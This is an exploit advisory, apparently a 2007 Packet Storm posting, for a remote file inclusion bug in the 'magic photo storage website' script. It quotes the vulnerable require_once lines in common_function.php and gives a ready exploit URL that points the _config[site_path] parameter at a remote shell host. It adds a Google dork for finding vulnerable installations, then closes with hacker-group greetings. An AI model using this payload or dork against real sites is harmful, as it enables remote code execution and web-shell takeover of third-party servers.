mpsw-rfi.txt

2007-01-13T00:00:00
ID PACKETSTORM:53542
Type packetstorm
Reporter k1tk4t
Modified 2007-01-13T00:00:00

Description

                                        
                                            `########################################################################  
# magic photo storage website -- Remote File Inclusion  
# Vendor : http://www.scriptaty.net/magic-photo-storage-website.html  
# Demo Site : http://www.turnkeydemos.info/demo/picstorage/  
# Found By : k1tk4t - k1tk4t[4t]newhack.org  
# Location : Indonesia -- #newhack[dot]org @irc.dal.net  
########################################################################  
file;  
common_function.php  
  
bug;  
require_once $_config['site_path'] . '/class/session.class.php';  
require_once $_config['site_path'] . '/class/validator.class.php';  
require_once $_config['site_path'] . '/include/message.php';  
########################################################################  
exploit;  
http://localhost/include/common_function.php?_config[site_path]=http://shell  
########################################################################  
Dork;  
allinurl:catalog_login.php  
########################################################################  
Thanks;  
str0ke  
xoron [www.xoron.biz]  
[mR]opt1lc,VaL,y3dips,lirva32,the_day,K-159  
evilcode,illibero,NoGe,nyubi,x-ace,ghoz,  
home_edition2001,matdhule,iFX,fusion  
and for all(friend's&enemy)  
@irc.dal.net  
#newhack[dot]org [all member&staff]  
#e-c-h-o [all member echo community]  
#asiahacker [all member asiahacker community]  
#nyubicrew [all member solpotcrew community] <-- at irc.komp-uter.org  
`